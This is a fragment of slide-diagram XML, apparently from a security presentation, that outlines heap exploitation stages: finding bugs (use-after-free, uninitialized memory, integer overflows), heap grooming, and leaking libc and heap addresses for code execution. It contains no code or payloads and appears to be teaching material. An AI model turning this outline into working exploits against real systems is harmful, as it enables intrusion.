        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Find real vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0B531D1-B90E-46AA-880A-DED2078B5F53}" type="parTrans" cxnId="{9C70E097-9585-4980-A946-40F716133B61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C71EC89C-9EF3-42B6-84F4-F07AE94CA8CE}" type="sibTrans" cxnId="{9C70E097-9585-4980-A946-40F716133B61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Groom</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C81D3CC7-91A3-4C8D-9F81-599C640E7C5D}" type="parTrans" cxnId="{F12530AD-52DF-471F-B225-6CD550F00B41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AA0ED09-043D-4354-AC5E-92B5B131BA6E}" type="sibTrans" cxnId="{F12530AD-52DF-471F-B225-6CD550F00B41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C856F48-A415-4C1B-A482-B3632BF35843}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Heap Feng Shui like a professional </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Allocation/deallocation primitives</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FEC195B-FA72-4C48-AFB8-F0693FBBB455}" type="parTrans" cxnId="{20764379-1613-4C84-AFCF-F99551957736}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6062545-132C-48EA-835F-30887715BBB9}" type="sibTrans" cxnId="{20764379-1613-4C84-AFCF-F99551957736}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{998178D1-54D8-4AB1-8F34-E1A7572A8AF0}" type="parTrans" cxnId="{124AE09D-E03E-4747-8B79-7B7F40A90A1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6717D412-1282-4A5F-AF6D-B3712D784335}" type="sibTrans" cxnId="{124AE09D-E03E-4747-8B79-7B7F40A90A1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64B8A8AE-8070-4F13-8777-F7CE6C280C10}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information leak for </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>libc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and heap addresses</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9D84081-4F5C-45C2-A456-65C1400400D6}" type="parTrans" cxnId="{321A9274-2D0E-4477-B31B-04D6F71DD384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF006AEC-7400-4CDA-B222-93E74DC0B0C4}" type="sibTrans" cxnId="{321A9274-2D0E-4477-B31B-04D6F71DD384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1B7B574-AE1A-47D3-A5BD-FE7BB0BBFE0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use after free for code execution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15B5DBBE-1DE3-477A-AC3A-C22B09750906}" type="parTrans" cxnId="{9DE93FEA-ACD8-4C33-883F-4396847CEC99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA527D79-1E3E-4823-9B59-0655B7CC4DE5}" type="sibTrans" cxnId="{9DE93FEA-ACD8-4C33-883F-4396847CEC99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13C88EEC-41B9-BE4A-A613-FA0BC57E337F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>UAF</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D2B92EC-74F6-E04D-873B-D70FEF63FC23}" type="parTrans" cxnId="{A33F2FDE-1C4A-5041-9EFB-78F4380DAA7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{684317DC-FC82-8C40-B2F7-6C377192AAA2}" type="sibTrans" cxnId="{A33F2FDE-1C4A-5041-9EFB-78F4380DAA7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06AB39F6-35F6-6648-865A-A772D8130151}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Uninitialized memory </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09357184-651E-0141-A5C3-A20CBFCDF772}" type="parTrans" cxnId="{2B1E7599-678F-BB46-8A3D-59306CAA02B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B79A923A-1321-C84B-A67C-FFB4165B1A78}" type="sibTrans" cxnId="{2B1E7599-678F-BB46-8A3D-59306CAA02B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00B25678-0E60-B942-8BE9-5083A32A621A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Integers overflows</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D08D8C3A-C9AE-AD47-902D-D30E66AEFA3E}" type="parTrans" cxnId="{E39B643B-4058-EC47-845C-5119123F5AF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20102D45-DA48-374B-A1D5-40835EE93D20}" type="sibTrans" cxnId="{E39B643B-4058-EC47-845C-5119123F5AF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BAF142D-2422-7345-BCFD-1C50023EA20A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Etc. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C78D7CE3-A452-1C4D-A01A-9769B3CD97A6}" type="parTrans" cxnId="{68CCC08C-5D3C-1D44-8CC3-71793F65DF67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1421C232-9B5A-A047-A0A5-689EA599143B}" type="sibTrans" cxnId="{68CCC08C-5D3C-1D44-8CC3-71793F65DF67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" type="pres">
      <dgm:prSet presAssocID="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25D35270-B948-8941-B74D-CD413127A64F}" type="pres">
      <dgm:prSet presAssocID="{B5E3E326-4479-453A-9863-465A1E47F809}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{643A7FF0-9837-9C4D-A601-2AD36DC83AF9}" type="pres">
      <dgm:prSet presAssocID="{B5E3E326-4479-453A-9863-465A1E47F809}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" type="pres">
      <dgm:prSet presAssocID="{B5E3E326-4479-453A-9863-465A1E47F809}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2803B661-C2D7-7E41-B727-D337D430C750}" type="pres">
      <dgm:prSet presAssocID="{057165DE-592C-4C48-9E8B-4A0E165849AC}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" type="pres">
      <dgm:prSet presAssocID="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}" type="pres">
      <dgm:prSet presAssocID="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}" type="pres">
      <dgm:prSet presAssocID="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA60B5ED-6FC1-EA4C-A5CB-9A4EE5B07D25}" type="pres">
      <dgm:prSet presAssocID="{0AA0ED09-043D-4354-AC5E-92B5B131BA6E}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" type="pres">
      <dgm:prSet presAssocID="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3308D2C7-7031-E147-B08E-4A839BD7E511}" type="pres">
      <dgm:prSet presAssocID="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{173132A0-8F0E-5A46-9688-8CF324862B5C}" type="pres">
      <dgm:prSet presAssocID="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{119AC50B-363D-AE4E-AE31-4B54F34029C9}" type="presOf" srcId="{00B25678-0E60-B942-8BE9-5083A32A621A}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{4AA0E70F-1A81-3E4F-B556-5AA1C2A8610C}" type="presOf" srcId="{B5E3E326-4479-453A-9863-465A1E47F809}" destId="{643A7FF0-9837-9C4D-A601-2AD36DC83AF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{BC961815-2F9F-4347-8E1C-ABC813178999}" type="presOf" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{A6E18629-2D3C-0B47-9924-79C64E70912C}" type="presOf" srcId="{13C88EEC-41B9-BE4A-A613-FA0BC57E337F}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{E39B643B-4058-EC47-845C-5119123F5AF9}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{00B25678-0E60-B942-8BE9-5083A32A621A}" srcOrd="2" destOrd="0" parTransId="{D08D8C3A-C9AE-AD47-902D-D30E66AEFA3E}" sibTransId="{20102D45-DA48-374B-A1D5-40835EE93D20}"/>
    <dgm:cxn modelId="{9E329856-96C5-4B23-88B3-D04215704C20}" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{B5E3E326-4479-453A-9863-465A1E47F809}" srcOrd="0" destOrd="0" parTransId="{E0F38ABF-175E-4946-97EC-62E269264AEB}" sibTransId="{057165DE-592C-4C48-9E8B-4A0E165849AC}"/>
    <dgm:cxn modelId="{120A8E6B-0B4C-334E-AF2C-32AA9B88BC21}" type="presOf" srcId="{64B8A8AE-8070-4F13-8777-F7CE6C280C10}" destId="{173132A0-8F0E-5A46-9688-8CF324862B5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{35C39671-0F2A-9547-8124-C6FDF559E9A4}" type="presOf" srcId="{5C856F48-A415-4C1B-A482-B3632BF35843}" destId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{321A9274-2D0E-4477-B31B-04D6F71DD384}" srcId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" destId="{64B8A8AE-8070-4F13-8777-F7CE6C280C10}" srcOrd="0" destOrd="0" parTransId="{A9D84081-4F5C-45C2-A456-65C1400400D6}" sibTransId="{DF006AEC-7400-4CDA-B222-93E74DC0B0C4}"/>
    <dgm:cxn modelId="{20764379-1613-4C84-AFCF-F99551957736}" srcId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" destId="{5C856F48-A415-4C1B-A482-B3632BF35843}" srcOrd="0" destOrd="0" parTransId="{3FEC195B-FA72-4C48-AFB8-F0693FBBB455}" sibTransId="{A6062545-132C-48EA-835F-30887715BBB9}"/>
    <dgm:cxn modelId="{028BB682-7672-5949-80F9-4A16C22AC1AD}" type="presOf" srcId="{06AB39F6-35F6-6648-865A-A772D8130151}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{70AB7686-7409-1B4E-84E9-27DBE8F41AE7}" type="presOf" srcId="{0BAF142D-2422-7345-BCFD-1C50023EA20A}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{68CCC08C-5D3C-1D44-8CC3-71793F65DF67}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{0BAF142D-2422-7345-BCFD-1C50023EA20A}" srcOrd="3" destOrd="0" parTransId="{C78D7CE3-A452-1C4D-A01A-9769B3CD97A6}" sibTransId="{1421C232-9B5A-A047-A0A5-689EA599143B}"/>
    <dgm:cxn modelId="{A1615893-F2C3-164C-870E-0A7648B490CE}" type="presOf" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{9C70E097-9585-4980-A946-40F716133B61}" srcId="{B5E3E326-4479-453A-9863-465A1E47F809}" destId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" srcOrd="0" destOrd="0" parTransId="{E0B531D1-B90E-46AA-880A-DED2078B5F53}" sibTransId="{C71EC89C-9EF3-42B6-84F4-F07AE94CA8CE}"/>
    <dgm:cxn modelId="{140DC798-F31E-A741-B44B-3BBA46D089CA}" type="presOf" srcId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" destId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{2B1E7599-678F-BB46-8A3D-59306CAA02B2}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{06AB39F6-35F6-6648-865A-A772D8130151}" srcOrd="1" destOrd="0" parTransId="{09357184-651E-0141-A5C3-A20CBFCDF772}" sibTransId="{B79A923A-1321-C84B-A67C-FFB4165B1A78}"/>
    <dgm:cxn modelId="{124AE09D-E03E-4747-8B79-7B7F40A90A1B}" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" srcOrd="2" destOrd="0" parTransId="{998178D1-54D8-4AB1-8F34-E1A7572A8AF0}" sibTransId="{6717D412-1282-4A5F-AF6D-B3712D784335}"/>
    <dgm:cxn modelId="{34E201A1-0C3D-B349-B4E1-8ADE68F2A912}" type="presOf" srcId="{D1B7B574-AE1A-47D3-A5BD-FE7BB0BBFE0D}" destId="{173132A0-8F0E-5A46-9688-8CF324862B5C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{F12530AD-52DF-471F-B225-6CD550F00B41}" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" srcOrd="1" destOrd="0" parTransId="{C81D3CC7-91A3-4C8D-9F81-599C640E7C5D}" sibTransId="{0AA0ED09-043D-4354-AC5E-92B5B131BA6E}"/>
    <dgm:cxn modelId="{2325F5C7-7483-564C-862F-D2B0D449F6B2}" type="presOf" srcId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" destId="{3308D2C7-7031-E147-B08E-4A839BD7E511}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{A33F2FDE-1C4A-5041-9EFB-78F4380DAA7D}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{13C88EEC-41B9-BE4A-A613-FA0BC57E337F}" srcOrd="0" destOrd="0" parTransId="{9D2B92EC-74F6-E04D-873B-D70FEF63FC23}" sibTransId="{684317DC-FC82-8C40-B2F7-6C377192AAA2}"/>
    <dgm:cxn modelId="{9DE93FEA-ACD8-4C33-883F-4396847CEC99}" srcId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" destId="{D1B7B574-AE1A-47D3-A5BD-FE7BB0BBFE0D}" srcOrd="1" destOrd="0" parTransId="{15B5DBBE-1DE3-477A-AC3A-C22B09750906}" sibTransId="{AA527D79-1E3E-4823-9B59-0655B7CC4DE5}"/>
    <dgm:cxn modelId="{B7501302-746A-664F-B438-BF24350AA037}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{25D35270-B948-8941-B74D-CD413127A64F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{3B0CDE0C-C477-D646-A9FE-EE267709CECF}" type="presParOf" srcId="{25D35270-B948-8941-B74D-CD413127A64F}" destId="{643A7FF0-9837-9C4D-A601-2AD36DC83AF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{9AF64B60-D3AB-944F-85AE-1950E8E4916C}" type="presParOf" srcId="{25D35270-B948-8941-B74D-CD413127A64F}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{7EEEE2FE-FF4C-B941-B4EB-998B8AC62832}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{2803B661-C2D7-7E41-B727-D337D430C750}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{5D68C300-7666-F34A-BDF9-1F72416C29BE}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{DC731A8C-B156-0441-AD03-5B8541D7B466}" type="presParOf" srcId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" destId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{010B8C1C-1A8F-1D48-8A79-1276D5A092AD}" type="presParOf" srcId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" destId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{01AE6FD8-3E4C-624C-906B-D239F73EFF93}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{FA60B5ED-6FC1-EA4C-A5CB-9A4EE5B07D25}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{8EBE0268-2925-F947-ABC9-038C11605591}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{31F38D46-84C8-7545-A307-E7C68CBAF8ED}" type="presParOf" srcId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" destId="{3308D2C7-7031-E147-B08E-4A839BD7E511}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{F7703E60-7AC8-A54E-BDB1-133F51C39E4F}" type="presParOf" srcId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" destId="{173132A0-8F0E-5A46-9688-8CF324862B5C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8B1A96-22E4-485B-96F0-691B898CEAAD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FC8A06-35B2-4195-BED0-13EA5156D668}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Source to Sink</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4539C87D-B19A-4CF8-BE59-685042FC329E}" type="parTrans" cxnId="{2B3C3E1D-8070-454B-86A7-05F4AB4DEF1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DD315CE-0298-4256-AE38-E69AA389B38A}" type="sibTrans" cxnId="{2B3C3E1D-8070-454B-86A7-05F4AB4DEF1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Sink to Source</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{812E1A04-BF4C-4B4B-AB46-CAE5FF53CDC2}" type="parTrans" cxnId="{2EF151D8-7626-4158-838A-6ED6DD9C9770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
